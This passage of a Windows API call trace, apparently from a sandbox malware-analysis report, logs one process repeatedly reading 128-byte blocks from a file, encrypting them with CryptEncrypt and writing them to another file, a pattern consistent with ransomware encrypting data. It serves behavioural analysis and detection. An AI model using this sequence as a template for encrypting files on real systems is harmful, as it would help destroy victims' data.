nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.495] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.495] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.495] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.496] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.496] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.496] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.496] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.496] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.496] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.496] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.497] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.497] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.497] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.497] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.497] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.497] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.498] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.498] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.498] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.498] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.498] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.498] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.499] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.499] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.499] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.499] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.499] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.500] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.500] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.500] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.500] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.500] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.500] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.501] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.501] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.501] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.501] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.501] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.502] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.502] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.502] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.502] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.502] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, 